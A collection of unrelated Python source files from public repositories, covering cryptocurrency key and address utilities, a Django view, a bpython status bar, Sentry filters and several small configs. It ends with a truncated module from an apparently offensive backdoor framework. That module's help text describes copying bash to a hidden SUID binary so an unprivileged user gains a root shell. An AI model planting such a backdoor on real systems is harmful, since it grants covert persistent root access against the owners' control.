DecodeAES = lambda secret, e: aes.decryptData(secret, base64.b64decode(e))
def strip_PKCS7_padding(s):
"""return s stripped of PKCS7 padding"""
if len(s)%16 or not s:
raise ValueError("String of len %d can't be PCKS7-padded" % len(s))
numpads = ord(s[-1])
if numpads > 16:
raise ValueError("String ending with %r can't be PCKS7-padded" % s[-1])
if s[-numpads:] != numpads*chr(numpads):
raise ValueError("Invalid PKCS7 padding")
return s[:-numpads]
def aes_encrypt_with_iv(key, iv, data):
mode = aes.AESModeOfOperation.modeOfOperation["CBC"]
key = map(ord, key)
iv = map(ord, iv)
data = aes.append_PKCS7_padding(data)
keysize = len(key)
assert keysize in aes.AES.keySize.values(), 'invalid key size: %s' % keysize
moo = aes.AESModeOfOperation()
(mode, length, ciph) = moo.encrypt(data, mode, key, keysize, iv)
return ''.join(map(chr, ciph))
def aes_decrypt_with_iv(key, iv, data):
mode = aes.AESModeOfOperation.modeOfOperation["CBC"]
key = map(ord, key)
iv = map(ord, iv)
keysize = len(key)
assert keysize in aes.AES.keySize.values(), 'invalid key size: %s' % keysize
data = map(ord, data)
moo = aes.AESModeOfOperation()
decr = moo.decrypt(data, None, mode, key, keysize, iv)
decr = strip_PKCS7_padding(decr)
return decr
def pw_encode(s, password):
if password:
secret = Hash(password)
return EncodeAES(secret, s.encode("utf8"))
else:
return s
def pw_decode(s, password):
if password is not None:
secret = Hash(password)
try:
d = DecodeAES(secret, s).decode("utf8")
except Exception:
raise Exception('Invalid password')
return d
else:
return s
def rev_hex(s):
return s.decode('hex')[::-1].encode('hex')
def int_to_hex(i, length=1):
s = hex(i)[2:].rstrip('L')
s = "0"*(2*length - len(s)) + s
return rev_hex(s)
def var_int(i):
# https://en.bitcoin.it/wiki/Protocol_specification#Variable_length_integer
if i<0xfd:
return int_to_hex(i)
elif i<=0xffff:
return "fd"+int_to_hex(i,2)
elif i<=0xffffffff:
return "fe"+int_to_hex(i,4)
else:
return "ff"+int_to_hex(i,8)
def op_push(i):
if i<0x4c:
return int_to_hex(i)
elif i<0xff:
return '4c' + int_to_hex(i)
elif i<0xffff:
return '4d' + int_to_hex(i,2)
else:
return '4e' + int_to_hex(i,4)
def sha256(x):
return hashlib.sha256(x).digest()
def Hash(x):
if type(x) is unicode: x=x.encode('utf-8')
return sha256(sha256(x))
hash_encode = lambda x: x[::-1].encode('hex')
hash_decode = lambda x: x.decode('hex')[::-1]
hmac_sha_512 = lambda x,y: hmac.new(x, y, hashlib.sha512).digest()
def is_new_seed(x, prefix=version.SEED_BIP44):
import mnemonic
x = mnemonic.prepare_seed(x)
s = hmac_sha_512("Seed version", x.encode('utf8')).encode('hex')
return s.startswith(prefix)
def is_old_seed(seed):
import old_mnemonic
words = seed.strip().split()
try:
old_mnemonic.mn_decode(words)
uses_electrum_words = True
except Exception:
uses_electrum_words = False
try:
seed.decode('hex')
is_hex = (len(seed) == 32)
except Exception:
is_hex = False
return is_hex or (uses_electrum_words and len(words) == 12)
# pywallet openssl private key implementation
def i2d_ECPrivateKey(pkey, compressed=False):
if compressed:
key = '3081d30201010420' + \
'%064x' % pkey.secret + \
'a081a53081a2020101302c06072a8648ce3d0101022100' + \
'%064x' % _p + \
'3006040100040107042102' + \
'%064x' % _Gx + \
'022100' + \
'%064x' % _r + \
'020101a124032200'
else:
key = '308201130201010420' + \
'%064x' % pkey.secret + \
'a081a53081a2020101302c06072a8648ce3d0101022100' + \
'%064x' % _p + \
'3006040100040107044104' + \
'%064x' % _Gx + \
'%064x' % _Gy + \
'022100' + \
'%064x' % _r + \
'020101a144034200'
return key.decode('hex') + i2o_ECPublicKey(pkey.pubkey, compressed)
def i2o_ECPublicKey(pubkey, compressed=False):
# public keys are 65 bytes long (520 bits)
# 0x04 + 32-byte X-coordinate + 32-byte Y-coordinate
# 0x00 = point at infinity, 0x02 and 0x03 = compressed, 0x04 = uncompressed
# compressed keys: <sign> <x> where <sign> is 0x02 if y is even and 0x03 if y is odd
if compressed:
if pubkey.point.y() & 1:
key = '03' + '%064x' % pubkey.point.x()
else:
key = '02' + '%064x' % pubkey.point.x()
else:
key = '04' + \
'%064x' % pubkey.point.x() + \
'%064x' % pubkey.point.y()
return key.decode('hex')
# end pywallet openssl private key implementation
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(sha256(public_key))
return md.digest()
except Exception:
import ripemd
md = ripemd.new(sha256(public_key))
return md.digest()
def public_key_to_bc_address(public_key):
h160 = hash_160(public_key)
return hash_160_to_bc_address(h160)
def hash_160_to_bc_address(h160, addrtype = 50):
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
def bc_address_to_hash_160(addr):
bytes = b58decode(addr, 25)
return ord(bytes[0]), bytes[1:21]
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
def b58encode(v):
""" encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
def PrivKeyToSecret(privkey):
return privkey[9:9+32]
def SecretToASecret(secret, compressed=False, addrtype=50):
vchIn = chr((addrtype+128)&255) + secret
if compressed: vchIn += '\01'
return EncodeBase58Check(vchIn)
def ASecretToSecret(key, addrtype=50):
vch = DecodeBase58Check(key)
if vch and vch[0] == chr((addrtype+128)&255):
return vch[1:]
else:
return False
def regenerate_key(sec):
b = ASecretToSecret(sec)
if not b:
return False
b = b[0:32]
return EC_KEY(b)
def GetPubKey(pubkey, compressed=False):
return i2o_ECPublicKey(pubkey, compressed)
def GetPrivKey(pkey, compressed=False):
return i2d_ECPrivateKey(pkey, compressed)
def GetSecret(pkey):
return ('%064x' % pkey.secret).decode('hex')
def is_compressed(sec):
b = ASecretToSecret(sec)
return len(b) == 33
def public_key_from_private_key(sec):
# rebuild public key from private key, compressed or uncompressed
pkey = regenerate_key(sec)
assert pkey
compressed = is_compressed(sec)
public_key = GetPubKey(pkey.pubkey, compressed)
return public_key.encode('hex')
def address_from_private_key(sec):
public_key = public_key_from_private_key(sec)
address = public_key_to_bc_address(public_key.decode('hex'))
return address
def is_valid(addr):
return is_address(addr)
def is_address(addr):
ADDRESS_RE = re.compile('[1-9A-HJ-NP-Za-km-z]{26,}\\Z')
if not ADDRESS_RE.match(addr): return False
try:
addrtype, h = bc_address_to_hash_160(addr)
except Exception:
return False
return addr == hash_160_to_bc_address(h, addrtype)
def is_private_key(key):
try:
k = ASecretToSecret(key)
return k is not False
except:
return False
########### end pywallet functions #######################
try:
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
except Exception:
print "cannot import ecdsa.curve_secp256k1. You probably need to upgrade ecdsa.\nTry: sudo pip install --upgrade ecdsa"
exit()
from ecdsa.curves import SECP256k1
from ecdsa.ellipticcurve import Point
from ecdsa.util import string_to_number, number_to_string
def msg_magic(message):
varint = var_int(len(message))
encoded_varint = "".join([chr(int(varint[i:i+2], 16)) for i in xrange(0, len(varint), 2)])
return "\x1bMyriadcoin Signed Message:\n" + encoded_varint + message
def verify_message(address, signature, message):
try:
EC_KEY.verify_message(address, signature, message)
return True
except Exception as e:
print_error("Verification error: {0}".format(e))
return False
def encrypt_message(message, pubkey):
return EC_KEY.encrypt_message(message, pubkey.decode('hex'))
def chunks(l, n):
return [l[i:i+n] for i in xrange(0, len(l), n)]
def ECC_YfromX(x,curved=curve_secp256k1, odd=True):
_p = curved.p()
_a = curved.a()
_b = curved.b()
for offset in range(128):
Mx = x + offset
My2 = pow(Mx, 3, _p) + _a * pow(Mx, 2, _p) + _b % _p
My = pow(My2, (_p+1)/4, _p )
if curved.contains_point(Mx,My):
if odd == bool(My&1):
return [My,offset]
return [_p-My,offset]
raise Exception('ECC_YfromX: No Y found')
def negative_point(P):
return Point( P.curve(), P.x(), -P.y(), P.order() )
def point_to_ser(P, comp=True ):
if comp:
return ( ('%02x'%(2+(P.y()&1)))+('%064x'%P.x()) ).decode('hex')
return ( '04'+('%064x'%P.x())+('%064x'%P.y()) ).decode('hex')
def ser_to_point(Aser):
curve = curve_secp256k1
generator = generator_secp256k1
_r = generator.order()
assert Aser[0] in ['\x02','\x03','\x04']
if Aser[0] == '\x04':
return Point( curve, string_to_number(Aser[1:33]), string_to_number(Aser[33:]), _r )
Mx = string_to_number(Aser[1:])
return Point( curve, Mx, ECC_YfromX(Mx, curve, Aser[0]=='\x03')[0], _r )
class MyVerifyingKey(ecdsa.VerifyingKey):
@classmethod
def from_signature(klass, sig, recid, h, curve):
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf, chapter 4.1.6 """
from ecdsa import util, numbertheory
import msqr
curveFp = curve.curve
G = curve.generator
order = G.order()
# extract r,s from signature
r, s = util.sigdecode_string(sig, order)
# 1.1
x = r + (recid/2) * order
# 1.3
alpha = ( x * x * x + curveFp.a() * x + curveFp.b() ) % curveFp.p()
beta = msqr.modular_sqrt(alpha, curveFp.p())
y = beta if (beta - recid) % 2 == 0 else curveFp.p() - beta
# 1.4 the constructor checks that nR is at infinity
R = Point(curveFp, x, y, order)
# 1.5 compute e from message:
e = string_to_number(h)
minus_e = -e % order
# 1.6 compute Q = r^-1 (sR - eG)
inv_r = numbertheory.inverse_mod(r,order)
Q = inv_r * ( s * R + minus_e * G )
return klass.from_public_point( Q, curve )
class EC_KEY(object):
def __init__( self, k ):
secret = string_to_number(k)
self.pubkey = ecdsa.ecdsa.Public_key( generator_secp256k1, generator_secp256k1 * secret )
self.privkey = ecdsa.ecdsa.Private_key( self.pubkey, secret )
self.secret = secret
def get_public_key(self, compressed=True):
return point_to_ser(self.pubkey.point, compressed).encode('hex')
def sign_message(self, message, compressed, address):
private_key = ecdsa.SigningKey.from_secret_exponent( self.secret, curve = SECP256k1 )
public_key = private_key.get_verifying_key()
signature = private_key.sign_digest_deterministic( Hash( msg_magic(message) ), hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_string )
assert public_key.verify_digest( signature, Hash( msg_magic(message) ), sigdecode = ecdsa.util.sigdecode_string)
for i in range(4):
sig = base64.b64encode( chr(27 + i + (4 if compressed else 0)) + signature )
try:
self.verify_message( address, sig, message)
return sig
except Exception:
continue
else:
raise Exception("error: cannot sign message")
@classmethod
def verify_message(self, address, signature, message):
sig = base64.b64decode(signature)
if len(sig) != 65: raise Exception("Wrong encoding")
nV = ord(sig[0])
if nV < 27 or nV >= 35:
raise Exception("Bad encoding")
if nV >= 31:
compressed = True
nV -= 4
else:
compressed = False
recid = nV - 27
h = Hash( msg_magic(message) )
public_key = MyVerifyingKey.from_signature( sig[1:], recid, h, curve = SECP256k1 )
# check public key
public_key.verify_digest( sig[1:], h, sigdecode = ecdsa.util.sigdecode_string)
# check that we get the original signing address
addr = public_key_to_bc_address( point_to_ser(public_key.pubkey.point, compressed) )
if address != addr:
raise Exception("Bad signature")
# ECIES encryption/decryption methods; AES-128-CBC with PKCS7 is used as the cipher; hmac-sha256 is used as the mac
@classmethod
def encrypt_message(self, message, pubkey):
pk = ser_to_point(pubkey)
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, pk.x(), pk.y()):
raise Exception('invalid pubkey')
ephemeral_exponent = number_to_string(ecdsa.util.randrange(pow(2,256)), generator_secp256k1.order())
ephemeral = EC_KEY(ephemeral_exponent)
ecdh_key = point_to_ser(pk * ephemeral.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
ciphertext = aes_encrypt_with_iv(key_e, iv, message)
ephemeral_pubkey = ephemeral.get_public_key(compressed=True).decode('hex')
encrypted = 'BIE1' + ephemeral_pubkey + ciphertext
mac = hmac.new(key_m, encrypted, hashlib.sha256).digest()
return base64.b64encode(encrypted + mac)
def decrypt_message(self, encrypted):
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
raise Exception('invalid ciphertext: length')
magic = encrypted[:4]
ephemeral_pubkey = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic != 'BIE1':
raise Exception('invalid ciphertext: invalid magic bytes')
try:
ephemeral_pubkey = ser_to_point(ephemeral_pubkey)
except AssertionError, e:
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, ephemeral_pubkey.x(), ephemeral_pubkey.y()):
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
ecdh_key = point_to_ser(ephemeral_pubkey * self.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac.new(key_m, encrypted[:-32], hashlib.sha256).digest():
raise Exception('invalid ciphertext: invalid mac')
return aes_decrypt_with_iv(key_e, iv, ciphertext)
###################################### BIP32 ##############################
random_seed = lambda n: "%032x"%ecdsa.util.randrange( pow(2,n) )
BIP32_PRIME = 0x80000000
def get_pubkeys_from_secret(secret):
# public key
private_key = ecdsa.SigningKey.from_string( secret, curve = SECP256k1 )
public_key = private_key.get_verifying_key()
K = public_key.to_string()
K_compressed = GetPubKey(public_key.pubkey,True)
return K, K_compressed
# Child private key derivation function (from master private key)
# k = master private key (32 bytes)
# c = master chain code (extra entropy for key derivation) (32 bytes)
# n = the index of the key we want to derive. (only 32 bits will be used)
# If n is negative (i.e. the 32nd bit is set), the resulting private key's
# corresponding public key can NOT be determined without the master private key.
# However, if n is positive, the resulting private key's corresponding
# public key can be determined without the master private key.
def CKD_priv(k, c, n):
is_prime = n & BIP32_PRIME
return _CKD_priv(k, c, rev_hex(int_to_hex(n,4)).decode('hex'), is_prime)
def _CKD_priv(k, c, s, is_prime):
import hmac
from ecdsa.util import string_to_number, number_to_string
order = generator_secp256k1.order()
keypair = EC_KEY(k)
cK = GetPubKey(keypair.pubkey,True)
data = chr(0) + k + s if is_prime else cK + s
I = hmac.new(c, data, hashlib.sha512).digest()
k_n = number_to_string( (string_to_number(I[0:32]) + string_to_number(k)) % order , order )
c_n = I[32:]
return k_n, c_n
# Child public key derivation function (from public key only)
# K = master public key
# c = master chain code
# n = index of key we want to derive
# This function allows us to find the nth public key, as long as n is
# non-negative. If n is negative, we need the master private key to find it.
def CKD_pub(cK, c, n):
if n & BIP32_PRIME: raise
return _CKD_pub(cK, c, rev_hex(int_to_hex(n,4)).decode('hex'))
# helper function, callable with arbitrary string
def _CKD_pub(cK, c, s):
import hmac
from ecdsa.util import string_to_number, number_to_string
order = generator_secp256k1.order()
I = hmac.new(c, cK + s, hashlib.sha512).digest()
curve = SECP256k1
pubkey_point = string_to_number(I[0:32])*curve.generator + ser_to_point(cK)
public_key = ecdsa.VerifyingKey.from_public_point( pubkey_point, curve = SECP256k1 )
c_n = I[32:]
cK_n = GetPubKey(public_key.pubkey,True)
return cK_n, c_n
BITCOIN_HEADER_PRIV = "0488ade4"
BITCOIN_HEADER_PUB = "0488b21e"
TESTNET_HEADER_PRIV = "04358394"
TESTNET_HEADER_PUB = "043587cf"
BITCOIN_HEADERS = (BITCOIN_HEADER_PUB, BITCOIN_HEADER_PRIV)
TESTNET_HEADERS = (TESTNET_HEADER_PUB, TESTNET_HEADER_PRIV)
def _get_headers(testnet):
"""Returns the correct headers for either testnet or bitcoin, in the form
of a 2-tuple, like (public, private)."""
if testnet:
return TESTNET_HEADERS
else:
return BITCOIN_HEADERS
def deserialize_xkey(xkey):
xkey = DecodeBase58Check(xkey)
assert len(xkey) == 78
xkey_header = xkey[0:4].encode('hex')
# Determine if the key is a bitcoin key or a testnet key.
if xkey_header in TESTNET_HEADERS:
head = TESTNET_HEADER_PRIV
elif xkey_header in BITCOIN_HEADERS:
head = BITCOIN_HEADER_PRIV
else:
raise Exception("Unknown xkey header: '%s'" % xkey_header)
depth = ord(xkey[4])
fingerprint = xkey[5:9]
child_number = xkey[9:13]
c = xkey[13:13+32]
if xkey[0:4].encode('hex') == head:
K_or_k = xkey[13+33:]
else:
K_or_k = xkey[13+32:]
return depth, fingerprint, child_number, c, K_or_k
def get_xkey_name(xkey, testnet=False):
depth, fingerprint, child_number, c, K = deserialize_xkey(xkey)
n = int(child_number.encode('hex'), 16)
if n & BIP32_PRIME:
child_id = "%d'"%(n - BIP32_PRIME)
else:
child_id = "%d"%n
if depth == 0:
return ''
elif depth == 1:
return child_id
else:
raise BaseException("xpub depth error")
def xpub_from_xprv(xprv, testnet=False):
depth, fingerprint, child_number, c, k = deserialize_xkey(xprv)
K, cK = get_pubkeys_from_secret(k)
header_pub, _ = _get_headers(testnet)
xpub = header_pub.decode('hex') + chr(depth) + fingerprint + child_number + c + cK
return EncodeBase58Check(xpub)
def bip32_root(seed, testnet=False):
import hmac
header_pub, header_priv = _get_headers(testnet)
I = hmac.new("Bitcoin seed", seed, hashlib.sha512).digest()
master_k = I[0:32]
master_c = I[32:]
K, cK = get_pubkeys_from_secret(master_k)
xprv = (header_priv + "00" + "00000000" + "00000000").decode("hex") + master_c + chr(0) + master_k
xpub = (header_pub + "00" + "00000000" + "00000000").decode("hex") + master_c + cK
return EncodeBase58Check(xprv), EncodeBase58Check(xpub)
def bip32_private_derivation(xprv, branch, sequence, testnet=False):
header_pub, header_priv = _get_headers(testnet)
depth, fingerprint, child_number, c, k = deserialize_xkey(xprv)
assert sequence.startswith(branch)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n[:-1]) + BIP32_PRIME if n[-1] == "'" else int(n)
parent_k = k
k, c = CKD_priv(k, c, i)
depth += 1
_, parent_cK = get_pubkeys_from_secret(parent_k)
fingerprint = hash_160(parent_cK)[0:4]
child_number = ("%08X"%i).decode('hex')
K, cK = get_pubkeys_from_secret(k)
xprv = header_priv.decode('hex') + chr(depth) + fingerprint + child_number + c + chr(0) + k
xpub = header_pub.decode('hex') + chr(depth) + fingerprint + child_number + c + cK
return EncodeBase58Check(xprv), EncodeBase58Check(xpub)
def bip32_public_derivation(xpub, branch, sequence, testnet=False):
header_pub, _ = _get_headers(testnet)
depth, fingerprint, child_number, c, cK = deserialize_xkey(xpub)
assert sequence.startswith(branch)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n)
parent_cK = cK
cK, c = CKD_pub(cK, c, i)
depth += 1
fingerprint = hash_160(parent_cK)[0:4]
child_number = ("%08X"%i).decode('hex')
xpub = header_pub.decode('hex') + chr(depth) + fingerprint + child_number + c + cK
return EncodeBase58Check(xpub)
def bip32_private_key(sequence, k, chain):
for i in sequence:
k, chain = CKD_priv(k, chain, i)
return SecretToASecret(k, True)
|
wozz/electrum-myr
|
lib/bitcoin.py
|
Python
|
gpl-3.0
| 24,716
|
b = 2
a = 1
|
asedunov/intellij-community
|
python/testData/mover/simple_afterDown.py
|
Python
|
apache-2.0
| 12
|
from chowdren.writers.events.system import get_loop_index_name
def use_deferred_collisions(converter):
return False
def init(converter):
converter.add_define('CHOWDREN_IS_TE')
converter.add_define('CHOWDREN_IS_TEED')
converter.add_define('CHOWDREN_QUICK_SCALE')
converter.add_define('CHOWDREN_POINT_FILTER')
converter.add_define('CHOWDREN_OBSTACLE_IMAGE')
converter.add_define('CHOWDREN_TEXTURE_GC')
converter.add_define('CHOWDREN_SPECIAL_POINT_FILTER')
converter.add_define('CHOWDREN_JOYSTICK2_CONTROLLER')
converter.add_define('CHOWDREN_FORCE_X360')
converter.add_define('CHOWDREN_FORCE_TRANSPARENT')
converter.add_define('CHOWDREN_FORCE_TEXT_LAYOUT')
converter.add_define('CHOWDREN_USE_GWEN')
def use_image_preload(converter):
return True
def use_image_flush(converter, frame):
return False
def use_edit_obj(converter):
return True
|
joaormatos/anaconda
|
Chowdren/configs/teed.py
|
Python
|
gpl-3.0
| 904
|
import Queue
import time
from bpython.repl import Interaction as BpythonInteraction
from manual_readline import char_sequences as rl_char_sequences
class StatusBar(BpythonInteraction):
"""StatusBar and Interaction for Repl
Passing of control back and forth between calls that use interact api
(notify, confirm, file_prompt) like bpython.Repl.write2file and events
on the main thread happens via those calls and self.wait_for_request_or_notify.
Calling one of these three is required for the main thread to regain control!
This is probably a terrible idea, and better would be rewriting this
functionality in a evented or callback style, but trying to integrate
bpython.Repl code.
"""
#TODO Remove dependence on bpython.Repl, it's more complicated than it's worth!
def __init__(self, initial_message='', permanent_text=""):
self._current_line = ''
self.cursor_offset_in_line = 0
self.in_prompt = False
self.in_confirm = False
self.prompt = ''
self._message = initial_message
self.message_start_time = time.time()
self.message_time = 3
self.permanent_text = permanent_text
self.response_queue = Queue.Queue(maxsize=1)
self.request_or_notify_queue = Queue.Queue()
@property
def has_focus(self):
return self.in_prompt or self.in_confirm
def message(self, msg):
self.message_start_time = time.time()
self._message = msg
def _check_for_expired_message(self):
if self._message and time.time() > self.message_start_time + self.message_time:
self._message = ''
def process_event(self, e):
"""Returns True if shutting down"""
assert self.in_prompt or self.in_confirm
if e in rl_char_sequences:
self.cursor_offset_in_line, self._current_line = rl_char_sequences[e](self.cursor_offset_in_line, self._current_line)
elif e == "":
raise KeyboardInterrupt()
elif e == "":
raise SystemExit()
elif self.in_prompt and e in ("\n", "\r"):
self.response_queue.put(self._current_line)
self.escape()
elif self.in_confirm:
if e in ('y', 'Y'):
self.response_queue.put(True)
else:
self.response_queue.put(False)
self.escape()
elif e == "\x1b":
self.response_queue.put(False)
self.escape()
else: # add normal character
#TODO factor this out, same in both process_event methods
self._current_line = (self._current_line[:self.cursor_offset_in_line] +
e +
self._current_line[self.cursor_offset_in_line:])
self.cursor_offset_in_line += 1
def escape(self):
"""unfocus from statusbar, clear prompt state, wait for notify call"""
self.wait_for_request_or_notify()
self.in_prompt = False
self.in_confirm = False
self.prompt = ''
self._current_line = ''
@property
def current_line(self):
self._check_for_expired_message()
if self.in_prompt:
return self.prompt + self._current_line
if self.in_confirm:
return self.prompt
if self._message:
return self._message
return self.permanent_text
def wait_for_request_or_notify(self):
try:
r = self.request_or_notify_queue.get(True, 1)
except Queue.Empty:
raise Exception('Main thread blocked because task thread not calling back')
return r
# interaction interface - should be called from other threads
def notify(self, msg, n=3):
self.message_time = n
self.message(msg)
self.request_or_notify_queue.put(msg)
# below Really ought to be called from threads other than the mainloop because they block
def confirm(self, q):
"""Expected to return True or False, given question prompt q"""
self.prompt = q
self.in_confirm = True
self.request_or_notify_queue.put(q)
return self.response_queue.get()
def file_prompt(self, s):
"""Expected to return a file name, given """
self.prompt = s
self.in_prompt = True
self.request_or_notify_queue.put(s)
r = self.response_queue.get()
return r
|
thomasballinger/scottwasright
|
scottsright/interaction.py
|
Python
|
mit
| 4,438
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from .generic import *
from criacao.forms import *
from criacao.models import *
from gerenciamento.models import *
logger = logging.getLogger(__name__)
class LinkView(GenericView):
def criar(self, request):
if request.method == 'POST':
form = LinkForm(request.POST)
if not form.is_valid():
data = {
'leftover' : {
'validation-error' : form.errors,
},
}
return data
name = request.POST['name']
url = request.POST['url']
link = Link(name=name, url=url)
try:
link.save()
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-success' : 'Link criado com sucesso!',
'redirect' : '/criacao/link/listar/'
},
}
return data
else:
museu, museu_nome = UTIL_informacoes_museu()
form = LinkForm()
data = {
'template' : {
'request' : request,
'museu_nome' : museu_nome,
'form' : form,
},
}
return data
def visualizar(self, request):
try:
pk = self.kwargs['key']
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-error' : 'Não foi possível processar essa visualização.',
}
}
else:
museu, museu_nome = UTIL_informacoes_museu()
link = Link.objects.get(pk=pk)
data = {
'template' : {
'request' : request,
'museu_nome' : museu_nome,
'link' : link,
},
}
finally:
return data
def editar(self, request):
if request.method == 'POST':
form = LinkForm(request.POST)
if not form.is_valid():
data = {
'leftover' : {
'validation-error' : form.errors,
},
}
return data
pk = self.kwargs['key']
name = request.POST['name']
url = request.POST['url']
link = Link.objects.get(pk=pk);
link.name=name
link.url=url
link.save()
data = {
'leftover' : {
'alert-success' : 'Link editada com sucesso!',
'redirect' : '/criacao/link/listar/'
},
}
return data
else:
try:
pk = self.kwargs['key']
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-error' : 'Não foi possível processar essa edição!',
}
}
else:
museu, museu_nome = UTIL_informacoes_museu()
link = Link.objects.get(pk=pk);
form = LinkForm(initial={
'name': link.name,
'url': link.url,
})
data = {
'template' : {
'request' : request,
'museu_nome' : museu_nome,
'link' : link,
'form' : form,
},
}
finally:
return data
def excluir(self, request):
try:
pk = self.kwargs['key']
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-error' : 'Não foi possível processar essa exclusão!',
}
}
else:
Link.objects.get(pk=pk).delete()
data = {
'leftover' : {
'alert-success' : 'Link deletado com sucesso!',
},
}
finally:
return data
def listar(self, request):
museu, museu_nome = UTIL_informacoes_museu()
links = Link.objects.order_by('-id')
try:
page = int(self.kwargs['key'])
except:
page = 1
finally:
links = paginate(obj=links, page=page, num_per_page=8)
data = {
'template' : {
'request' : request,
'museu' : museu,
'museu_nome' : museu_nome,
'links' : links,
},
}
return data
|
wendellpbarreto/tronco
|
criacao/views/link.py
|
Python
|
mit
| 3,423
|
# Try to Import module in same directory as me, but:
#from . import m1 # <==OK in package, not allowed in non-package mode in 2.X + 3.X
#import m1 # <==OK in program, fails to check package's own dir in 3.X
# set PYTHONPATH=c:\code
import dualpkg.m1 as m1 # <==works in both modes if sys.path includes pks root
def somefunc():
m1.somefunc()
print('m2.somefunc')
if __name__ == '__main__':
somefunc() # Self-test or top-level script code
|
simontakite/sysadmin
|
pythonscripts/learningPython/dualpkg/m2.py
|
Python
|
gpl-2.0
| 492
|
#
# Copyright (C) 2000 Stephen Davies
# Copyright (C) 2000 Stefan Seefeld
# All rights reserved.
# Licensed to the public under the terms of the GNU LGPL (>= 2),
# see the file COPYING for details.
#
from Synopsis.Formatters.HTML.Tags import *
from Default import Default
class DetailCommenter(Default):
"""Add annotation details to all declarations."""
def format_declaration(self, decl):
details = self.processor.documentation.details(decl, self.view)
return div(details or '', class_='doc')
|
stefanseefeld/synopsis
|
Synopsis/Formatters/HTML/Fragments/DetailCommenter.py
|
Python
|
lgpl-2.1
| 523
|
"""
sentry.filters.helpers
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
# Widget api is pretty ugly
from __future__ import absolute_import
__all__ = ('get_filters',)
import logging
from django.utils.translation import ugettext_lazy as _
from sentry.conf import settings
from sentry.filters.base import TagFilter
from sentry.plugins import plugins
from sentry.models import ProjectOption, FilterKey
FILTER_CACHE = {}
TAG_FILTER_CACHE = {}
def get_filters(model=None, project=None):
filter_list = []
# Add builtins (specified with the FILTERS setting)
for class_path in settings.FILTERS:
if class_path not in FILTER_CACHE:
module_name, class_name = class_path.rsplit('.', 1)
try:
module = __import__(module_name, {}, {}, class_name)
cls = getattr(module, class_name)
except Exception:
logger = logging.getLogger('sentry.errors.filters')
logger.exception('Unable to import %s', class_path)
continue
FILTER_CACHE[class_path] = cls
filter_list.append(FILTER_CACHE[class_path])
if project:
for tag in ProjectOption.objects.get_value(project, 'tags', FilterKey.objects.all_keys(project)):
if tag not in TAG_FILTER_CACHE:
# Generate a new filter class because we are lazy and do
# not want to rewrite code
class new(TagFilter):
label = _(tag.replace('_', ' ').title())
column = tag
new.__name__ = '__%sGeneratedFilter' % str(tag)
TAG_FILTER_CACHE[tag] = new
filter_list.append(TAG_FILTER_CACHE[tag])
# Add plugin-provided filters
for plugin in plugins.all():
if not plugin.is_enabled(project):
continue
for filter_cls in plugin.get_filters(project):
if filter_cls not in filter_list:
filter_list.append(filter_cls)
# yield all filters which support ``model``
for filter_cls in filter_list:
if model and model not in filter_cls.types:
continue
yield filter_cls
|
chayapan/django-sentry
|
src/sentry/filters/helpers.py
|
Python
|
bsd-3-clause
| 2,281
|
from backdoors.backdoor import *
class Shell(Backdoor):
prompt = Fore.RED + "(shell) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Shell backdoor..."
self.core = core
self.options = {
"name" : Option("name", "/bin/.bash", "name of the duplicated shell", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = GOOD + "The shell backdoor is a priviledge escalation backdoor, similar to (but more powerful than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Unlike the SetUID backdoor though, this shell gives an unpriviledged user root priviledge with a full shell. Note that you need root access to initially deploy. To use, while SSHed in as an unpriviledged user, simply run \".bash -p\", and you will have root access."
def get_command(self):
